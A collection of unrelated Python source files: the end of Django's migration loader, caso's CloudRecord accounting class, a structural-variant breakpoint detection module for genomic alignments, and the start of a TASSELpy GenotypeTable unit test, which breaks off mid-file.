raise ValueError("Dependency on app with no migrations: %s" % key[0])
raise ValueError("Dependency on unknown app: %s" % key[0])
def add_internal_dependencies(self, key, migration):
"""
Internal dependencies need to be added first to ensure `__first__`
dependencies find the correct root node.
"""
for parent in migration.dependencies:
# Ignore __first__ references to the same app.
if parent[0] == key[0] and parent[1] != '__first__':
self.graph.add_dependency(migration, key, parent, skip_validation=True)
def add_external_dependencies(self, key, migration):
for parent in migration.dependencies:
# Skip internal dependencies
if key[0] == parent[0]:
continue
parent = self.check_key(parent, key[0])
if parent is not None:
self.graph.add_dependency(migration, key, parent, skip_validation=True)
for child in migration.run_before:
child = self.check_key(child, key[0])
if child is not None:
self.graph.add_dependency(migration, child, key, skip_validation=True)
def build_graph(self):
"""
Build a migration dependency graph using both the disk and database.
You'll need to rebuild the graph if you apply migrations. This isn't
usually a problem as generally migration stuff runs in a one-shot process.
"""
# Load disk data
self.load_disk()
# Load database data
if self.connection is None:
self.applied_migrations = set()
else:
recorder = MigrationRecorder(self.connection)
self.applied_migrations = recorder.applied_migrations()
# To start, populate the migration graph with nodes for ALL migrations
# and their dependencies. Also make note of replacing migrations at this step.
self.graph = MigrationGraph()
self.replacements = {}
for key, migration in self.disk_migrations.items():
self.graph.add_node(key, migration)
# Replacing migrations.
if migration.replaces:
self.replacements[key] = migration
for key, migration in self.disk_migrations.items():
# Internal (same app) dependencies.
self.add_internal_dependencies(key, migration)
# Add external dependencies now that the internal ones have been resolved.
for key, migration in self.disk_migrations.items():
self.add_external_dependencies(key, migration)
# Carry out replacements where possible.
for key, migration in self.replacements.items():
# Get applied status of each of this migration's replacement targets.
applied_statuses = [(target in self.applied_migrations) for target in migration.replaces]
# Ensure the replacing migration is only marked as applied if all of
# its replacement targets are.
if all(applied_statuses):
self.applied_migrations.add(key)
else:
self.applied_migrations.discard(key)
# A replacing migration can be used if either all or none of its
# replacement targets have been applied.
if all(applied_statuses) or (not any(applied_statuses)):
self.graph.remove_replaced_nodes(key, migration.replaces)
else:
# This replacing migration cannot be used because it is partially applied.
# Remove it from the graph and remap dependencies to it (#25945).
self.graph.remove_replacement_node(key, migration.replaces)
# Ensure the graph is consistent.
try:
self.graph.validate_consistency()
except NodeNotFoundError as exc:
# Check if the missing node could have been replaced by any squash
# migration but wasn't because the squash migration was partially
# applied before. In that case raise a more understandable exception
# (#23556).
# Get reverse replacements.
reverse_replacements = {}
for key, migration in self.replacements.items():
for replaced in migration.replaces:
reverse_replacements.setdefault(replaced, set()).add(key)
# Try to reraise exception with more detail.
if exc.node in reverse_replacements:
candidates = reverse_replacements.get(exc.node, set())
is_replaced = any(candidate in self.graph.nodes for candidate in candidates)
if not is_replaced:
tries = ', '.join('%s.%s' % c for c in candidates)
raise NodeNotFoundError(
"Migration {0} depends on nonexistent node ('{1}', '{2}'). "
"Django tried to replace migration {1}.{2} with any of [{3}] "
"but wasn't able to because some of the replaced migrations "
"are already applied.".format(
exc.origin, exc.node[0], exc.node[1], tries
),
exc.node
) from exc
raise exc
self.graph.ensure_not_cyclic()
def check_consistent_history(self, connection):
"""
Raise InconsistentMigrationHistory if any applied migrations have
unapplied dependencies.
"""
recorder = MigrationRecorder(connection)
applied = recorder.applied_migrations()
for migration in applied:
# If the migration is unknown, skip it.
if migration not in self.graph.nodes:
continue
for parent in self.graph.node_map[migration].parents:
if parent not in applied:
# Skip unapplied squashed migrations that have all of their
# `replaces` applied.
if parent in self.replacements:
if all(m in applied for m in self.replacements[parent].replaces):
continue
raise InconsistentMigrationHistory(
"Migration {}.{} is applied before its dependency "
"{}.{} on database '{}'.".format(
migration[0], migration[1], parent[0], parent[1],
connection.alias,
)
)
def detect_conflicts(self):
"""
Look through the loaded graph and detect any conflicts - apps
with more than one leaf migration. Return a dict of the app labels
that conflict with the migration names that conflict.
"""
seen_apps = {}
conflicting_apps = set()
for app_label, migration_name in self.graph.leaf_nodes():
if app_label in seen_apps:
conflicting_apps.add(app_label)
seen_apps.setdefault(app_label, set()).add(migration_name)
return {app_label: seen_apps[app_label] for app_label in conflicting_apps}
def project_state(self, nodes=None, at_end=True):
"""
Return a ProjectState object representing the most recent state
that the loaded migrations represent.
See graph.make_state() for the meaning of "nodes" and "at_end".
"""
return self.graph.make_state(nodes=nodes, at_end=at_end, real_apps=list(self.unmigrated_apps))
| |
# -*- coding: utf-8 -*-
# Copyright 2014 Spanish National Research Council (CSIC)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import json
import pprint
import caso
from caso import exception
class CloudRecord(object):
"""The CloudRecord class holds information for each of the records.
This class is versioned, following the Cloud Accounting Record versions.
"""
# Version 0.2: initial version
# Version 0.4: Add 0.4 fields
version = "0.4"
_v02_fields = [
"VMUUID",
"SiteName",
"MachineName",
"LocalUserId",
"LocalGroupId",
"GlobalUserName",
"FQAN",
"Status",
"StartTime",
"EndTime",
"SuspendDuration",
"WallDuration",
"CpuDuration",
"CpuCount",
"NetworkType",
"NetworkInbound",
"NetworkOutbound",
"Memory",
"Disk",
"StorageRecordId",
"ImageId",
"CloudType",
]
_v04_fields = _v02_fields + [
"CloudComputeService",
"BenchmarkType",
"Benchmark",
"PublicIPCount",
]
_version_field_map = {
"0.2": _v02_fields,
"0.4": _v04_fields,
}
def __init__(self, uuid, site, name, user_id, group_id, fqan,
status=None,
start_time=None, end_time=None,
suspend_duration=None, wall_duration=None, cpu_duration=None,
network_type=None, network_in=None, network_out=None,
cpu_count=None, memory=None, disk=None,
image_id=None, cloud_type=caso.user_agent,
storage_record_id=None,
vo=None, vo_group=None, vo_role=None,
user_dn=None,
compute_service=None,
benchmark_value=None, benchmark_type=None,
public_ip_count=None):
self.uuid = uuid
self.site = site
self.name = name
self.user_id = user_id
self.group_id = group_id
self.fqan = fqan
self.status = status
self.start_time = start_time
self.end_time = end_time
self.suspend_duration = suspend_duration
self.wall_duration = wall_duration
self.cpu_duration = cpu_duration
self.network_type = network_type
self.network_in = network_in
self.network_out = network_out
self.cpu_count = cpu_count
self.memory = memory
self.disk = disk
self.image_id = image_id
self.cloud_type = cloud_type
self.storage_record_id = storage_record_id
self.user_dn = user_dn
self.compute_service = compute_service
self.benchmark_value = benchmark_value
self.benchmark_type = benchmark_type
self.public_ip_count = public_ip_count
def __repr__(self):
return pprint.pformat(self.as_dict())
def as_dict(self, version=None):
"""Return CloudRecord as a dictionary.
:param str version: optional, if passed it will format the record
acording to that account record version
:returns: A dict containing the record.
"""
if version is None:
version = self.version
if version not in self._version_field_map:
raise exception.RecordVersionNotFound(version=version)
return {k: v for k, v in self.map.items()
if k in self._version_field_map[version]}
@property
def wall_duration(self):
duration = None
if self._wall_duration is not None:
duration = self._wall_duration
elif None not in (self._start_time, self._end_time):
duration = (self.end_time - self.start_time).total_seconds()
return int(duration) if duration is not None else None
@wall_duration.setter
def wall_duration(self, value):
if value and not isinstance(value, (int, float)):
raise ValueError("Duration must be a number")
self._wall_duration = value
@property
def cpu_duration(self):
duration = None
if self._cpu_duration is not None:
duration = self._cpu_duration
elif self.wall_duration is not None and self.cpu_count:
duration = self.wall_duration * self.cpu_count
return int(duration) if duration is not None else None
@cpu_duration.setter
def cpu_duration(self, value):
if value and not isinstance(value, (int, float)):
raise ValueError("Duration must be a number")
self._cpu_duration = value
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, value):
if value and not isinstance(value, datetime.datetime):
raise ValueError("Dates must be datetime.datetime objects")
self._start_time = value
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, value):
if value and not isinstance(value, datetime.datetime):
raise ValueError("Dates must be datetime.datetime objects")
self._end_time = value
@property
def map(self):
d = {'VMUUID': self.uuid,
'SiteName': self.site,
'MachineName': self.name,
'LocalUserId': self.user_id,
'LocalGroupId': self.group_id,
'FQAN': self.fqan,
'Status': self.status,
'StartTime': self.start_time and int(
self.start_time.strftime("%s")
),
'EndTime': self.end_time and int(self.end_time.strftime("%s")),
'SuspendDuration': self.suspend_duration,
'WallDuration': self.wall_duration,
'CpuDuration': self.cpu_duration,
'CpuCount': self.cpu_count,
'NetworkType': self.network_type,
'NetworkInbound': self.network_in,
'NetworkOutbound': self.network_out,
'Memory': self.memory,
'Disk': self.disk,
'StorageRecordId': self.storage_record_id,
'ImageId': self.image_id,
'CloudType': self.cloud_type,
'GlobalUserName': self.user_dn,
'PublicIPCount': self.public_ip_count,
'Benchmark': self.benchmark_value,
'BenchmarkType': self.benchmark_type,
'CloudComputeService': self.compute_service,
}
return d
def as_json(self, version=None):
return json.dumps(self.as_dict(version=version))
| |
from __future__ import print_function
import logging
import multiprocessing
from collections import defaultdict
import pybedtools
from defaults import MIN_INV_SUBALIGN_LENGTH, MIN_DEL_SUBALIGN_LENGTH,AGE_WINDOW_SIZE
logger = logging.getLogger(__name__)
def get_insertion_breakpoints(age_records, intervals, expected_bp_pos, window=AGE_WINDOW_SIZE, start=0, dist_to_expected_bp=50):
func_logger = logging.getLogger("%s-%s" % (get_insertion_breakpoints.__name__, multiprocessing.current_process()))
bedtools_intervals = [pybedtools.Interval("1", interval[0], interval[1]) for interval in sorted(intervals)]
func_logger.info("bedtools_intervals %s" % (str(bedtools_intervals)))
if not bedtools_intervals:
return []
potential_breakpoints = sorted(list(set(
[interval.start for interval in bedtools_intervals] + [interval.end for interval in bedtools_intervals])))
breakpoints = []
for breakpoint in potential_breakpoints[1:-1]:
# Check if the breakpoint is within window distance of a validated breakpoint
if min([window + 1] + [abs(b[0] - breakpoint) for b in breakpoints]) <= window:
continue
func_logger.info("\tExamining potential breakpoint %d for support" % breakpoint)
left_support = [interval[0] for interval in intervals if abs(interval[0] - breakpoint) <= window]
right_support = [interval[1] for interval in intervals if abs(interval[1] - breakpoint) <= window]
counter_examples = [age_record for age_record in age_records if age_record.has_long_ref_flanks() and (
age_record.has_ref_deletion(window) or age_record.has_insertion(min_diff=20,
max_diff=49)) and age_record.breakpoint_match(
breakpoint, window)]
if counter_examples:
counter_example_ends = [age_record.start1_end1s for age_record in counter_examples]
func_logger.info("\t\tSkipping breakpoint %d due to %s" % (breakpoint, str(counter_example_ends)))
continue
if left_support:
func_logger.info("\t\tLeft support %s" % (str(left_support)))
if right_support:
func_logger.info("\t\tRight support %s" % (str(right_support)))
if (left_support and right_support) and min(
[window + 1] + [abs(b[0] - breakpoint) for b in breakpoints]) > window:
both_support = [age_record for age_record in age_records if
age_record.has_insertion(min_diff=50, max_diff=1000000000) and age_record.breakpoint_match(
breakpoint, window)]
if both_support:
func_logger.info("\t\tboth_support = %s" % (str(both_support)))
func_logger.info("\t\tinsertion lengths = %s" % (
str([age_record.insertion_length() for age_record in both_support])))
insertion_length = max([0] + [age_record.insertion_length() for age_record in both_support])
insertion_sequence = both_support[0].get_insertion_sequence() if both_support else "."
func_logger.info("\t\tInsertion length = %d %s" % (insertion_length, insertion_sequence))
breakpoints.append((breakpoint, insertion_length, insertion_sequence))
func_logger.info("Nonfiltered breakpoints as %s" % (str(breakpoints)))
if len(breakpoints)>1:
breakpoints=filter(lambda x: min(abs(x[0]-expected_bp_pos[0]),abs(expected_bp_pos[1]-x[0]))<dist_to_expected_bp,breakpoints)
func_logger.info("Gathered breakpoints as %s" % (str(breakpoints)))
return [(start + b[0], b[1], b[2]) for b in breakpoints]
def get_deletion_breakpoints(age_records, window=20, min_flank_length=50, start=0):
func_logger = logging.getLogger("%s-%s" % (get_deletion_breakpoints.__name__, multiprocessing.current_process()))
potential_breakpoints = sorted(
[age_record.start1_end1s[0][1] for age_record in age_records] + [age_record.start1_end1s[1][0] for age_record in
age_records])
breakpoints = []
for breakpoint in potential_breakpoints:
left_support = [age_record for age_record in age_records if
abs(age_record.start1_end1s[0][1] - breakpoint) < window]
right_support = [age_record for age_record in age_records if
abs(age_record.start1_end1s[1][0] - breakpoint) < window]
if (left_support or right_support) and min([window + 1] + [abs(b - breakpoint) for b in breakpoints]) >= window:
breakpoints.append(breakpoint)
func_logger.info("Gathered breakpoints as %s" % (str(breakpoints)))
return [start + breakpoint for breakpoint in breakpoints]
def check_closeness_to_bp(pos,pad,dist_to_expected_bp,LR_bp,seq_length=0):
if LR_bp == 'L':
return abs(pos-pad)<dist_to_expected_bp
else:
return abs(pos-(seq_length-pad))<dist_to_expected_bp
def get_inversion_breakpoints(age_records, window=20, min_endpoint_dist=10, start=0, pad=500, dist_to_expected_bp=400, min_inv_subalign_len=MIN_INV_SUBALIGN_LENGTH):
func_logger = logging.getLogger("%s-%s" % (get_deletion_breakpoints.__name__, multiprocessing.current_process()))
potential_breakpoints = []
for age_record in age_records:
polarities=[abs(age_record.polarities1[i]-age_record.polarities2[i]) for i in range(age_record.nfrags)]
good_intervals=[i for i in range(age_record.nfrags) if abs(age_record.start1_end1s[i][1]-age_record.start1_end1s[i][0]) > min_inv_subalign_len and abs(age_record.start2_end2s[i][1]-age_record.start2_end2s[i][0]) > min_inv_subalign_len]
good_intervals=[i for i in good_intervals if abs(age_record.start1_end1s[i][1]-age_record.start1_end1s[i][0]) <= max(age_record.inputs[0].length-2*(pad-dist_to_expected_bp),pad+dist_to_expected_bp)]
func_logger.info('Good intervals: %s'%str(good_intervals))
if len(good_intervals)<2:
func_logger.info('Not enough good interval for this age record: %s'%str(age_record))
continue
candidate_inv_intervals=[]
inv_interval=-1
long_inversion=False
left_end_near_l_bp=filter(lambda x: check_closeness_to_bp(min(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"L"), good_intervals)
right_end_near_r_bp=filter(lambda x: check_closeness_to_bp(max(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"R",age_record.inputs[0].length), good_intervals)
right_end_near_l_bp=filter(lambda x: check_closeness_to_bp(max(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"L"), good_intervals)
left_end_near_r_bp=filter(lambda x: check_closeness_to_bp(min(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"R",age_record.inputs[0].length), good_intervals)
candidate_inv_intervals=list(set(left_end_near_l_bp)&set(right_end_near_r_bp))
candidate_norm_intervals=list(set(left_end_near_r_bp)|set(right_end_near_l_bp))
if len(candidate_inv_intervals)>1 and len(candidate_norm_intervals)<=1:
candidate_inv_intervals=list(set(candidate_inv_intervals)-set(candidate_norm_intervals))
if len(candidate_inv_intervals)>1:
dist_to_exp_bps=map(lambda x: abs(min(age_record.start1_end1s[x])-pad)+abs(max(age_record.start1_end1s[x])-(age_record.inputs[0].length-pad)),candidate_inv_intervals)
inv_interval=min(enumerate(dist_to_exp_bps),key=lambda x:x[1])[0]
elif len(candidate_inv_intervals)==1 :
inv_interval=candidate_inv_intervals[0]
if inv_interval==-1:
#Potentially long inversion
candidate_inv_intervals=[i for i in left_end_near_l_bp if ((set(candidate_norm_intervals)&set(left_end_near_r_bp))-set([i]))] + \
[i for i in right_end_near_r_bp if ((set(candidate_norm_intervals)&set(right_end_near_l_bp))-set([i]))]
if len(candidate_inv_intervals)>1:
candidate_inv_intervals=[i for i in set(candidate_inv_intervals)&set(left_end_near_l_bp) if (pad< (sum(age_record.start1_end1s[i])/2.0))] + \
[i for i in set(candidate_inv_intervals)&set(right_end_near_r_bp) if ((age_record.inputs[0].length-pad) > (sum(age_record.start1_end1s[i])/2.0))]
if candidate_inv_intervals:
func_logger.info('Potentially long-inversion interval: %s'%candidate_inv_intervals)
long_inversion=True
if len(candidate_inv_intervals)>1:
dist_to_exp_bps=map(lambda x: abs(min(age_record.start1_end1s[x])-pad) if i in left_end_near_l_bp else abs(max(age_record.start1_end1s[x])-(age_record.inputs[0].length-pad)),candidate_inv_intervals)
inv_interval=min(enumerate(dist_to_exp_bps),key=lambda x:x[1])[0]
else:
inv_interval=candidate_inv_intervals[0]
elif age_record.inputs[0].length > ((2*pad+min_inv_subalign_len)):
long_inversion=True
if inv_interval==-1:
func_logger.info('Not candidate inversion interval found for this age record: %s'%str(age_record))
continue
func_logger.info('age_record: %s'%str(age_record))
func_logger.info('inverted interval: %s'%str(inv_interval))
candidate_norm_intervals=filter(lambda x: polarities[x]!=polarities[inv_interval], set(candidate_norm_intervals)-set([inv_interval]))
if long_inversion and (inv_interval not in set(left_end_near_l_bp) & set(right_end_near_r_bp)) :
candidate_norm_intervals=list(set(candidate_norm_intervals)&set(left_end_near_r_bp if (inv_interval in left_end_near_l_bp) else right_end_near_l_bp))
if not candidate_norm_intervals:
func_logger.info('Cannot find the normal interval for this age record: %s'%str(age_record))
continue
if len(candidate_norm_intervals)>1:
candidate_norm_intervals=map(lambda x: (x,abs(age_record.start1_end1s[x][0]-age_record.start1_end1s[x][1])),set(candidate_norm_intervals))
norm_interval,norm_length=max(candidate_norm_intervals,key=lambda x:x[2])
else:
norm_interval=candidate_norm_intervals[0]
func_logger.info('norm_interval: %s'%str(norm_interval))
s_inv=sorted(age_record.start1_end1s[inv_interval])
s_norm=sorted(age_record.start1_end1s[norm_interval])
if (s_norm[0]-s_inv[0])*(s_norm[1]-s_inv[1])<=0:
func_logger.info('Bad intervals (one fully covers the other): %s'%str(age_record))
continue
if not long_inversion:
interval=age_record.start2_end2s[inv_interval]
if min([interval[0],abs(interval[0]-age_record.inputs[1].length),
interval[1],abs(interval[1]-age_record.inputs[1].length)]) < min_endpoint_dist:
func_logger.info('Inverted interval end points are too close to borders in Seq2: %s'%str(age_record))
continue
if (((s_norm[1]>s_inv[1]) and ((s_inv[1]-s_norm[0])>10)) or ((s_norm[0]<s_inv[0]) and ((s_norm[1]-s_inv[0])>10))):
func_logger.info('Bad middle bp in seq1 (covers>10): %s'%str(age_record))
continue
if (((s_norm[1]>s_inv[1]) and ((s_norm[0]-s_inv[1])>50)) or ((s_norm[0]<s_inv[0]) and ((s_inv[0]-s_norm[1])>50))):
func_logger.info('Bad middle bp in seq1 (apart>50): %s'%str(age_record))
continue
bp_idx = 0 if (s_norm[1]>s_inv[1]) else 1
bp1=s_inv[bp_idx]
bp2=s_norm[bp_idx]
bp1_seq2=age_record.start2_end2s[inv_interval][filter(lambda x:age_record.start1_end1s[inv_interval][x]==bp1,[0,1])[0]]
bp2_seq2=age_record.start2_end2s[norm_interval][filter(lambda x:age_record.start1_end1s[norm_interval][x]==bp2,[0,1])[0]]
if abs(bp1_seq2-bp2_seq2)>10:
func_logger.info('BPs do not match in seq2: %s'%str(age_record))
continue
potential_breakpoints += [bp1,bp2]
potential_breakpoints=sorted(potential_breakpoints)
breakpoints = []
for breakpoint in potential_breakpoints:
if min([window + 1] + [abs(b - breakpoint) for b in breakpoints]) >= window:
breakpoints.append(breakpoint)
func_logger.info("Gathered breakpoints as %s" % (str(breakpoints)))
return [start + breakpoint for breakpoint in breakpoints]
def get_duplication_breakpoints(age_records, window=20, max_endpoint_dist=10, start=0, pad=500, dist_to_expected_bp=400):
func_logger = logging.getLogger("%s-%s" % (get_deletion_breakpoints.__name__, multiprocessing.current_process()))
potential_breakpoints = []
for age_record in age_records:
left_end_near_l_bp=filter(lambda x: check_closeness_to_bp(min(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"L"), [0,1])
right_end_near_r_bp=filter(lambda x: check_closeness_to_bp(max(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"R",age_record.inputs[0].length), [0,1])
if (not left_end_near_l_bp) or (not right_end_near_r_bp):
func_logger.info('Not close to expected BPs: %s'%str(age_record))
continue
if len(left_end_near_l_bp)==2 and len(right_end_near_r_bp)==1:
left_end_near_l_bp = list(set(left_end_near_l_bp)-set(right_end_near_r_bp))
elif len(left_end_near_l_bp)==1 and len(right_end_near_r_bp)==2:
right_end_near_r_bp = list(set(right_end_near_r_bp)-set(left_end_near_l_bp))
elif len(left_end_near_l_bp)==2 and len(right_end_near_r_bp)==2:
dist_to_exp_l_bp=map(lambda x: abs(min(age_record.start1_end1s[x])-pad),[0,1])
dist_to_exp_r_bp=map(lambda x: abs(max(age_record.start1_end1s[x])-(age_record.inputs[0].length-pad)),[0,1])
left_end_near_l_bp, right_end_near_r_bp = [[0],[1]] if (dist_to_exp_l_bp[0]+dist_to_exp_r_bp[1]) < (dist_to_exp_l_bp[1]+dist_to_exp_r_bp[0]) else [[1],[0]]
l_interval = left_end_near_l_bp[0]
r_interval = right_end_near_r_bp[0]
bp_idx_l = 0 if age_record.start1_end1s[l_interval][0]<age_record.start1_end1s[l_interval][1] else 1
bp_idx_r = 1 if age_record.start1_end1s[r_interval][0]<age_record.start1_end1s[r_interval][1] else 0
if abs(age_record.start2_end2s[l_interval][bp_idx_l]-age_record.start2_end2s[r_interval][bp_idx_r]) > 10:
func_logger.info('BPs do not match in seq2: %s'%str(age_record))
continue
end_l_seq2 = age_record.start2_end2s[l_interval][1-bp_idx_l]
end_r_seq2 = age_record.start2_end2s[r_interval][1-bp_idx_r]
if max(min(end_r_seq2,end_l_seq2),
min(end_l_seq2-age_record.inputs[1].length,
end_r_seq2-age_record.inputs[1].length)) > max_endpoint_dist:
func_logger.info('End points are too close to borders in Seq2: %s'%str(age_record))
continue
potential_breakpoints += [age_record.start1_end1s[l_interval][bp_idx_l],age_record.start1_end1s[r_interval][bp_idx_r]]
potential_breakpoints=sorted(potential_breakpoints)
breakpoints = []
for breakpoint in potential_breakpoints:
if min([window + 1] + [abs(b - breakpoint) for b in breakpoints]) >= window:
breakpoints.append(breakpoint)
func_logger.info("Gathered breakpoints as %s" % (str(breakpoints)))
return [start + breakpoint for breakpoint in breakpoints]
def get_reference_intervals(age_records, start=0, min_interval_len=100):
intervals = []
for age_record in age_records:
intervals += map(lambda x: (min(x) + start - 1, max(x) + start - 1),
[interval for interval in age_record.start1_end1s if
abs(interval[0] - interval[1]) >= min_interval_len])
return intervals
def process_age_records(age_records, sv_type="INS", ins_min_unaligned=10, min_interval_len=200, pad=500,
min_deletion_len=30, min_del_subalign_len=MIN_DEL_SUBALIGN_LENGTH,
min_inv_subalign_len=MIN_INV_SUBALIGN_LENGTH, dist_to_expected_bp=400,
age_window=AGE_WINDOW_SIZE, pad_ins=0, sc_locations=[]):
func_logger = logging.getLogger("%s-%s" % (process_age_records.__name__, multiprocessing.current_process()))
good_age_records = age_records
if sv_type == "INS":
good_age_records = [age_record for age_record in good_age_records if
not age_record.almost_all_bases_aligned(ins_min_unaligned)]
good_age_records = [age_record for age_record in good_age_records if not age_record.is_reference()]
elif sv_type == "DEL":
good_age_records = [age_record for age_record in good_age_records if
len(age_record.start1_end1s) == 2 and min(age_record.ref_flanking_regions) >= min_del_subalign_len]
good_age_records = [age_record for age_record in good_age_records if
abs(age_record.start1_end1s[0][1] - age_record.start1_end1s[1][0]) >= min_deletion_len]
good_age_records = [age_record for age_record in good_age_records if
float(age_record.score) / sum(age_record.ref_flanking_regions) >= 0.7]
good_age_records = [age_record for age_record in good_age_records if
abs(age_record.start2_end2s[0][1] - age_record.start2_end2s[1][0]) <= 50]
good_age_records = [age_record for age_record in good_age_records if
check_closeness_to_bp(min(age_record.start1_end1s[0][1],
age_record.start1_end1s[1][0]),
pad,dist_to_expected_bp,"L") and
check_closeness_to_bp(max(age_record.start1_end1s[0][1],
age_record.start1_end1s[1][0]),
pad,dist_to_expected_bp,"R",
age_record.inputs[0].length)]
elif sv_type == "INV":
good_age_records = [age_record for age_record in good_age_records if
len(age_record.start1_end1s) >= 2 and min(map(lambda x:abs(x[1]-x[0]),age_record.start1_end1s)) >= min_inv_subalign_len]
elif sv_type == "DUP":
good_age_records = [age_record for age_record in good_age_records if
len(age_record.start1_end1s) == 2 and min(age_record.ref_flanking_regions) >= 100]
else:
pass
# Add some features to an info dict
info = defaultdict(int)
info["BA_NUM_GOOD_REC"] = len(good_age_records)
if not good_age_records:
func_logger.warning("No good records found for getting breakpoints")
return [], dict(info)
for rec in good_age_records:
info["BA_FLANK_PERCENT"] = int(max(info["BA_FLANK_PERCENT"], rec.flank_percent))
info["BA_NFRAGS"] = int(max(info["BA_NFRAGS"], rec.nfrags))
info["BA_NUM_ALT"] = int(max(info["BA_NUM_ALT"], rec.n_alt))
info["BA_PERCENT_MATCH"] = int(max(info["BA_PERCENT_MATCH"], rec.percent))
func_logger.info("Found %d good records for getting breakpoints" % (len(good_age_records)))
func_logger.info("Good records")
for age_record in good_age_records:
func_logger.info(str(age_record))
sv_region = good_age_records[0].contig.sv_region
if sv_type == "DEL":
breakpoints = get_deletion_breakpoints(good_age_records, start=sv_region.pos1 - pad)
elif sv_type == "INS":
reference_intervals = get_reference_intervals(good_age_records, start=1, min_interval_len=min_interval_len)
func_logger.info("Gathered reference intervals as %s" % (str(reference_intervals)))
breakpoints = get_insertion_breakpoints(good_age_records, reference_intervals,
expected_bp_pos=[pad+pad_ins,max((sv_region.pos2-sv_region.pos1)-pad_ins+pad,0)],
window=age_window,
start=sv_region.pos1 - pad)
elif sv_type == "INV":
breakpoints = get_inversion_breakpoints(good_age_records, start=sv_region.pos1 - pad ,pad=pad, min_inv_subalign_len=min_inv_subalign_len, dist_to_expected_bp=dist_to_expected_bp)
elif sv_type == "DUP":
breakpoints = get_duplication_breakpoints(good_age_records, start=sv_region.pos1 - pad ,pad=pad, dist_to_expected_bp=dist_to_expected_bp)
else:
return [], dict(info)
func_logger.info("Detected breakpoints as %s" % (str(breakpoints)))
# Add a few more features related to the breakpoints computed
info["BA_NUM_BP"] = len(breakpoints)
if sv_type == "DEL":
if len(breakpoints) == 2:
func_logger.info("True deletion interval %s" % (str(breakpoints)))
else:
func_logger.info("False deletion interval %s" % (str(breakpoints)))
return [], dict(info)
elif sv_type == "INS":
if len(breakpoints) == 1:
# if sv_region.pos2 - sv_region.pos1 <= 20:
# info["BA_BP_SCORE"] = abs(breakpoints[0][0] - sv_region.pos1)
# if abs(breakpoints[0][0] - sv_region.pos1) > 20:
# return [], dict(info)
# else:
if not sc_locations:
sc_locations = [sv_region.pos1 + pad_ins, sv_region.pos2 - pad_ins]
min_diff = min(map(lambda x: abs(x - breakpoints[0][0]), sc_locations))
info["BA_BP_SCORE"] = min_diff
if min_diff > 100:
func_logger.info("False insertion since resolved breakpoint not close to a soft-clip location")
return [], dict(info)
func_logger.info("True insertion interval %s" % (str(breakpoints)))
else:
return [], dict(info)
elif sv_type == "INV":
if len(breakpoints) == 2:
func_logger.info("True inversion interval %s" % (str(breakpoints)))
else:
func_logger.info("False inversion interval %s" % (str(breakpoints)))
return [], dict(info)
elif sv_type == "DUP":
if len(breakpoints) == 2:
func_logger.info("True duplication interval %s" % (str(breakpoints)))
else:
func_logger.info("False duplication interval %s" % (str(breakpoints)))
return [], dict(info)
return breakpoints, dict(info)
| |
import unittest
import javabridge
from javabridge import JavaException, is_instance_of
import numpy as np
from TASSELpy.TASSELbridge import TASSELbridge
try:
try:
javabridge.get_env()
except AttributeError:
print("AttributeError: start bridge")
TASSELbridge.start()
except AssertionError:
print("AssertionError: start bridge")
TASSELbridge.start()
except:
raise RuntimeError("Could not start JVM")
from TASSELpy.net.maizegenetics.dna.WHICH_ALLELE import WHICH_ALLELE
from TASSELpy.net.maizegenetics.dna.snp.GenotypeTable import GenotypeTable
from TASSELpy.net.maizegenetics.dna.map.PositionList import PositionList
from TASSELpy.net.maizegenetics.taxa.TaxaList import TaxaList
from TASSELpy.net.maizegenetics.util.BitSet import BitSet
from TASSELpy.net.maizegenetics.dna.snp.ImportUtils import ImportUtils
from TASSELpy.utils.primativeArray import meta_byte_array, meta_long_array, meta_int_array, javaPrimativeArray
from TASSELpy.javaObj import javaArray
from TASSELpy.net.maizegenetics.dna.map.Chromosome import Chromosome
from TASSELpy.java.lang.Integer import metaInteger
from TASSELpy.java.lang.Long import metaLong
from TASSELpy.java.lang.String import String,metaString
from TASSELpy.java.lang.Byte import metaByte
from TASSELpy.java.lang.Boolean import metaBoolean
from TASSELpy.java.lang.Double import metaDouble
from TASSELpy.net.maizegenetics.dna.snp.depth.AlleleDepth import AlleleDepth
from TASSELpy.data import data_constants
debug = False
java_imports = {'IllegalStateException': 'java/lang/IllegalStateException',
'NullPointerException': 'java/lang/NullPointerException',
'UnsupportedOperationException': 'java/lang/UnsupportedOperationException'}
class GenotypeTableTest(unittest.TestCase):
""" Tests for GenotypeTable.py """
@classmethod
def setUpClass(cls):
# Load data
try:
cls.data = ImportUtils.readGuessFormat(data_constants.SHORT_HMP_FILE)
except:
raise ValueError("Could not load test data")
def test_genotypeArray(self):
if debug: print "Testing genotypeArray"
arr = self.data.genotypeArray(0,0)
self.assertIsInstance(arr,meta_byte_array)
def test_genotype(self):
if debug: print "Testing genotype"
first_site_chrom = self.data.chromosome(0)
first_site_pos = self.data.chromosomalPosition(0)
geno1 = self.data.genotype(0,0)
self.assertIsInstance(geno1, metaByte)
self.assertEqual(geno1, self.data.genotype(0,first_site_chrom,first_site_pos))
def test_genotypeRange(self):
if debug: print "Testing genotypeRange"
arr = self.data.genotypeRange(0,0,1)
self.assertIsInstance(arr,meta_byte_array)
def test_genotypeAllSites(self):
if debug: print "Testing genotypeAllSites"
arr = self.data.genotypeAllSites(0)
self.assertIsInstance(arr,meta_byte_array)
def test_genotypeAllTaxa(self):
if debug: print "Testing genotypeAllTaxa"
arr = self.data.genotypeAllTaxa(0)
self.assertIsInstance(arr,meta_byte_array)
def test_allelePresenceForAllSites(self):
if debug: print "Testing allelePresenceForAllSites"
bitset_major = self.data.allelePresenceForAllSites(0,WHICH_ALLELE.Major)
self.assertIsInstance(bitset_major,BitSet)
def test_allelePresenceForSitesBlock(self):
if debug: print "Testing allelePresenceForSitesBlock"
